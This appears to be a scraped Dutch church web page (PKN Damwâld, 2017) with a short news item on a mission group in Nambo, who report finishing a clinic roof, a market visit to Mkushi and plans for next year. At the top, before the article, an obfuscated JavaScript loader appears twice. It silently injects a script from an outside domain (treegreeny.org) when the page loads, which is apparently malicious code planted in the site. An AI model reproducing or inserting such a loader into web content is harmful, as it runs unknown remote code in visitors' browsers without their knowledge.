;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ZA317 | Volgend jaar weer met z'n allen? - PKN Damwâld

ZA317 | Volgend jaar weer met z’n allen?

Gepubliceerd op: vrijdag 11 augustus 2017

De sfeer in Nambo is zo goed, dat de groep speelt met de gedachte om volgend jaar weer met z’n allen op pad te gaan. Nou, we zullen zien. Eerst Missie Nambo maar voltooien! Daarmee zijn ze op de goede weg: ‘Het dak zit op de kliniek’, schrijven Alie en Jan in een SMS. ‘Mooi, mooi, mooi’, zegt coördinator Michael daarover.

‘De sfeer is uitstekend. We hebben het al over volgend jaar, om dan weer met z’n allen op pad te gaan. De Nambo Express was een groot feest. Gister hebben we zeven kippen geslacht als groep en die zijn verorberd door (bijna) de hele groep. Vandaag zijn we met een groepje naar de markt geweest in Mkushi, de wat grotere plaats hier in de buurt. Het weekend komt er weer aan en er staat ons van alles te wachten. De groep weet het nog maar half, maar het past mooi onder het kopje ‘cultuursnuiven’. We zien ernaar uit, later meer! Groeten van Alie en Jan’.

Foto's